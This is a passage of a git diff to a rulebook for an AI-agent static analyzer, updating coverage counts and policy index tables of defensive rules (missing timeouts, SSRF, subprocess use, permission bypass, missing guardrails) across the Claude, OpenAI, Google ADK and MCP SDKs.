Tool has no failure_error_function | medium | 0.70 | 28.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 35 | OAI-005 | OpenAI SDK | tool | openai_tool | Network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 36 | OAI-006 | OpenAI SDK | tool | openai_tool | Tool accepts path without normalization | high | 0.70 | 49.0 | [openai_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/path_safety.yaml) | +| 37 | OAI-007 | OpenAI SDK | tool | openai_tool | Ambiguous tool name | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 38 | OAI-008 | OpenAI SDK | tool | openai_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [openai_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/error_handling.yaml) | +| 39 | OAI-009 | OpenAI SDK | tool | openai_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | +| 40 | OAI-010 | OpenAI SDK | tool | openai_tool | Tool function prints to stdout for diagnostics | low | 0.65 | 9.8 | [openai_sdk/observability.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/observability.yaml) | +| 41 | OAI-011 | OpenAI SDK | tool | openai_tool | urllib network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 42 | OAI-012 | OpenAI SDK | tool | openai_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [openai_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/shell_safety.yaml) | +| 43 | OAI-013 | OpenAI SDK | tool | openai_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | +| 44 | OAI-014 | OpenAI SDK | tool | openai_tool | Privileged tool has no needs_approval gate | high | 0.70 | 49.0 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | +| 45 | OAI-015 | OpenAI SDK | tool | openai_tool | Tool sets failure_error_function=None | high | 0.85 | 59.5 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 46 | OAI-016 | OpenAI SDK | tool | openai_tool | TypeScript tool fetch call has no AbortSignal timeout | high | 0.60 | 42.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 47 | OAI-017 | OpenAI SDK | tool | openai_tool | TypeScript tool body calls eval / new Function on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | +| 48 | OAI-018 | OpenAI SDK | tool | openai_tool | Tool builds outbound URL from non-literal value | medium | 0.55 | 22.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 49 | OAI-019 | OpenAI SDK | tool | openai_tool | TypeScript mutating tool has no idempotency key | medium | 0.50 | 20.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | +| 50 | OAI-022 | OpenAI SDK | tool | openai_tool | TypeScript tool has no description | low | 0.85 | 12.8 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 51 | OAI-024 | OpenAI SDK | tool | openai_tool | TypeScript tool builds outbound URL from a non-literal value | medium | 0.60 | 24.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 52 | OAI-101 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent has no input_guardrails AND wires shell or filesystem-touching tools | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 53 | OAI-102 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses tool_use_behavior="stop_on_first_tool" | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 54 | OAI-103 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | tool_choice="required" combined with reset_tool_choice=False | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 55 | OAI-104 | OpenAI SDK | agent | openai_agent | Raw Agent (not SandboxAgent) wires shell or filesystem-touching tools | medium | 0.75 | 30.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 56 | OAI-105 | OpenAI SDK | agent | openai_agent | TypeScript agent wires a content-fetching hosted tool without inputGuardrails | high | 0.80 | 56.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 57 | OAI-106 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires MCP servers without input_guardrails | high | 0.90 | 63.0 | [openai_sdk/mcp_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/mcp_safety.yaml) | +| 58 | OAI-109 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses WebSearchTool without input_guardrails | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 59 | OAI-110 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a content-fetching tool without output_guardrails | high | 0.60 | 42.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 60 | OAI-111 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a privileged hosted tool without needs_approval | high | 0.75 | 52.5 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | +| 61 | OAI-201 | OpenAI SDK | repo | openai_agents | Project uses default OpenAI tracing | medium | 0.80 | 32.0 | [openai_sdk/tracing.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tracing.yaml) | +| 62 | OAI-202 | OpenAI SDK | repo | openai_agents | OpenAI Agents project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [openai_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/repo_hygiene.yaml) | +| 63 | ADK-001 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no docstring | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 64 | ADK-002 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no type-annotated parameters | medium | 0.85 | 34.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 65 | ADK-003 | Google ADK | tool | adk_function_tool | Network call has no timeout | high | 0.85 | 59.5 | [google_adk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/network.yaml) | +| 66 | ADK-004 | Google ADK | tool | adk_function_tool | Path parameter used in I/O without normalization | high | 0.70 | 49.0 | [google_adk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/path_safety.yaml) | +| 67 | ADK-005 | Google ADK | tool | adk_function_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [google_adk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/error_handling.yaml) | +| 68 | ADK-006 | Google ADK | tool | adk_function_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [google_adk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/idempotency.yaml) | +| 69 | ADK-007 | Google ADK | tool | adk_function_tool | Ambiguous tool name | low | 0.90 | 13.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 70 | ADK-008 | Google ADK | agent | adk_llm_agent | Agent grants BashTool with no restrictive command policy | high | 0.75 | 52.5 | [google_adk/builtin_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/builtin_tools.yaml) | +| 71 | ADK-009 | Google ADK | tool | adk_function_tool | FunctionTool body prints to stdout | low | 0.70 | 10.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 72 | ADK-010 | Google ADK | tool | adk_function_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [google_adk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/shell_safety.yaml) | +| 73 | ADK-011 | Google ADK | tool | adk_function_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | +| 74 | ADK-012 | Google ADK | tool | adk_function_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | +| 75 | ADK-013 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool has no description | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 76 | ADK-015 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool body evaluates dynamic code | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | +| 77 | ADK-016 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | +| 78 | ADK-101 | Google ADK | agent | adk_llm_agent | LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 79 | ADK-102 | Google ADK | agent | adk_llm_agent | Agent with BashTool has no before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 80 | ADK-103 | Google ADK | agent | adk_llm_agent | Sub-agent is granted BashTool | high | 0.90 | 63.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 81 | ADK-104 | Google ADK | agent | adk_llm_agent | Agent has no safety_settings | medium | 0.75 | 30.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 82 | ADK-105 | Google ADK | agent | adk_llm_agent | Agent uses web search built-in without before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 83 | ADK-106 | Google ADK | agent | adk_llm_agent | Agent has a code_executor but no before_model_callback | high | 0.80 | 56.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 84 | ADK-107 | Google ADK | agent | adk_llm_agent | Agent grants AgentTool but has no before_tool_callback | high | 0.70 | 49.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 85 | ADK-108 | Google ADK | agent | adk_loop_agent | LoopAgent has no max_iterations | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 86 | ADK-109 | Google ADK | agent | adk_llm_agent | TypeScript LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 87 | ADK-110 | Google ADK | agent | adk_llm_agent | Agent fetches web content via UrlContextTool/LoadWebPage without before_tool_callback | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 88 | ADK-201 | Google ADK | repo | google_adk | Google ADK project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [google_adk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/repo_hygiene.yaml) | +| 89 | MCP-001 | MCP | tool | mcp_tool | Tool has no description | low | 0.90 | 13.5 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 90 | MCP-002 | MCP | tool | mcp_tool | Tool has no type-annotated parameters | medium | 0.85 | 34.0 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 91 | MCP-003 | MCP | tool | mcp_tool | Ambiguous tool name | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 92 | MCP-004 | MCP | tool | mcp_tool | Network call has no timeout | high | 0.85 | 59.5 | [mcp/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/network.yaml) | +| 93 | MCP-005 | MCP | tool | mcp_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [mcp/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/path_safety.yaml) | +| 94 | MCP-006 | MCP | tool | mcp_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [mcp/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/error_handling.yaml) | +| 95 | MCP-007 | MCP | tool | mcp_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [mcp/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/idempotency.yaml) | +| 96 | MCP-008 | MCP | tool | mcp_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | +| 97 | MCP-009 | MCP | tool | mcp_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | +| 98 | MCP-010 | MCP | tool | mcp_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | +| 99 | MCP-011 | MCP | tool | mcp_tool | TypeScript MCP tool has no description | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 100 | MCP-012 | MCP | tool | mcp_tool | TypeScript MCP tool spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | +| 101 | MCP-013 | MCP | tool | mcp_tool | TypeScript MCP tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | +| 102 | MCP-014 | MCP | tool | mcp_tool | TypeScript MCP tool evaluates dynamic code | high | 0.90 | 63.0 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | diff --git a/README.md b/README.md index 08f1d5c..e0c93d2 100644 --- a/README.md +++ b/README.md @@ -5,11 +5,13 @@ static analyzer's policy ruleset. Canonical YAML rules live in [trustabl/trustabl-rules](https://github.com/trustabl/trustabl-rules) — this repo links into them and explains the threat model behind each rule. -Coverage spans three agent SDKs: +Coverage spans three agent SDKs plus a protocol-level rule family for the +Model Context Protocol: - **Claude Agent SDK** (`CSDK-*`) — [claude_sdk/](claude_sdk/) - **OpenAI Agents SDK** (`OAI-*`) — [openai_sdk/](openai_sdk/) - **Google ADK** (`ADK-*`) — [google_adk/](google_adk/) +- **Model Context Protocol** (`MCP-*`) — [mcp/](mcp/) (rules ship; rationale docs not yet authored — see [coverage](#current-totals) below) ## What lives here @@ -35,12 +37,27 @@ Risk score = `severity_weight × confidence × 100`. Weights: `low=0.15`, ## Current totals -| SDK | Tool | Agent | Subagent | Repo | Total | -| ------------------- | ------ | ------ | -------- | ----- | ------ | -| Claude Agent SDK | 7 | 2 | 1 | 0 | 10 | -| OpenAI Agents SDK | 13 | 6 | 0 | 1 | 20 | -| Google ADK | 8 | 5 | 0 | 0 | 13 | -| **All** | **28** | **13** | **1** | **1** | **43** | +The engine ships **102 rules across 45 files** in +[trustabl-rules](https://github.com/trustabl/trustabl-rules). This rulebook +documents **88 of them across 37 rationale docs** — full rationale coverage of +the three agent SDKs (Claude Agent SDK, OpenAI Agents SDK, Google ADK). The +breakdown below counts **shipped rules per family**; the rightmost column flags +where rationale docs are still missing. + +| Family | Tool | Agent | Subagent | Repo | Shipped | Rationale docs | +| ---------------------- | ------ | ------ | -------- | ----- | ------- | -------------- | +| Claude Agent SDK | 17 | 8 | 2 | 3 | 30 | 30 ✓ | +| OpenAI Agents SDK | 21 | 9 | 0 | 2 | 32 | 32 ✓ | +| Google ADK | 14 | 11 | 0 | 1 | 26 | 26 ✓ | +| Model Context Protocol | 14 | 0 | 0 | 0 | 14 | 0 — see gap | +| **All** | **66** | **28** | **2** | **6** | **102** | **88** | + +**Coverage gap (honest):** the `mcp/` pack — 14 rules, `MCP-001`–`MCP-014`, all +tool-scope — ships in `trustabl-rules` and now appears in +[POLICY_INDEX.md](POLICY_INDEX.md), but **has no rationale docs yet** (no +`docs/Policy/mcp/` directory). Until those are authored, `tools/check_rulebook.py` +fails on the 14 missing-doc errors. Authoring them (threat models + OWASP +citations) is tracked separately. Full breakdown: [POLICY_INDEX.md](POLICY_INDEX.md). diff --git a/claude_sdk/POLICY_INDEX.md b/claude_sdk/POLICY_INDEX.md index efc429d..71eb52f 100644 --- a/claude_sdk/POLICY_INDEX.md +++ b/claude_sdk/POLICY_INDEX.md @@ -1,30 +1,39 @@ # Claude Agent SDK policy index -21 rules — 11 tool · 5 agent · 2 subagent · 3 repo +30 rules — 17 tool · 8 agent · 2 subagent · 3 repo Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. -| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | -| -- | -------- | ---------- | -------- | ------------------------- | ---------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------ | -| 1 | CSDK-001 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool has no description | low | 0.95 | 14.3 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 2 | CSDK-002 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool parameters are not type-annotated | medium | 0.90 | 36.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 3 | CSDK-003 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/network.yaml) | -| 4 | CSDK-004 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | -| 5 | CSDK-005 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/error_handling.yaml) | -| 6 | CSDK-006 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | -| 7 | CSDK-007 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Ambiguous tool name | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 8 | CSDK-008 | Claude SDK | tool | claude_sdk_tool | Tool exposes **kwargs without explicit input_schema | medium | 0.80 | 32.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 9 | CSDK-009 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | -| 10 | CSDK-101 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the Bash tool | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 11 | CSDK-102 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebSearch tool | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 12 | CSDK-103 | Claude SDK | agent | claude_agent_definition | AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 13 | CSDK-104 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted filesystem-write built-ins | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 14 | CSDK-105 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebFetch tool | high | 0.75 | 52.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 15 | CSDK-107 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | -| 16 | CSDK-108 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | -| 17 | CSDK-110 | Claude SDK | subagent | claude_subagent | Subagent granted the built-in Bash tool | high | 0.90 | 63.0 | [subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | -| 18 | CSDK-111 | Claude SDK | subagent | claude_subagent | Subagent granted filesystem-write or web-fetch built-ins | high | 0.85 | 59.5 | [subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | -| 19 | CSDK-201 | Claude SDK | repo | claude_sdk | Project default permission mode bypasses approvals | high | 0.90 | 63.0 | [repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | -| 20 | CSDK-202 | Claude SDK | repo | claude_sdk | Session permission mode bypasses approvals | high | 0.90 | 63.0 | [repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | -| 21 | CSDK-203 | Claude SDK | repo | claude_sdk | Repo ships Claude Agent SDK code without a CLAUDE.md | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo_hygiene.yaml) | +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | -------- | ---------- | -------- | ----------------------- | ------------------------------------------------------------------------------------ | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------ | +| 1 | CSDK-001 | Claude SDK | tool | claude_sdk_tool | Tool has no description | low | 0.95 | 14.3 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 2 | CSDK-002 | Claude SDK | tool | claude_sdk_tool | Tool parameters are not type-annotated | medium | 0.90 | 36.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 3 | CSDK-003 | Claude SDK | tool | claude_sdk_tool | Network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/network.yaml) | +| 4 | CSDK-004 | Claude SDK | tool | claude_sdk_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | +| 5 | CSDK-005 | Claude SDK | tool | claude_sdk_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/error_handling.yaml) | +| 6 | CSDK-006 | Claude SDK | tool | claude_sdk_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | +| 7 | CSDK-007 | Claude SDK | tool | claude_sdk_tool | Ambiguous tool name | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 8 | CSDK-008 | Claude SDK | tool | claude_sdk_tool | Tool exposes **kwargs without explicit input_schema | medium | 0.80 | 32.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 9 | CSDK-009 | Claude SDK | tool | claude_sdk_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | +| 10 | CSDK-010 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool shells out to the OS | high | 0.70 | 49.0 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | +| 11 | CSDK-011 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool evaluates dynamic code | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | +| 12 | CSDK-012 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool writes to the filesystem | medium | 0.50 | 20.0 | [path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | +| 13 | CSDK-013 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | +| 14 | CSDK-014 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 15 | CSDK-016 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK mutating tool has no idempotency key | medium | 0.50 | 20.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | +| 16 | CSDK-101 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the Bash tool | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 17 | CSDK-102 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebSearch tool | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 18 | CSDK-103 | Claude SDK | agent | claude_agent_definition | AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 19 | CSDK-104 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted filesystem-write built-ins | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 20 | CSDK-105 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebFetch tool | high | 0.75 | 52.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 21 | CSDK-107 | Claude SDK | tool | claude_sdk_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | +| 22 | CSDK-108 | Claude SDK | tool | claude_sdk_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | 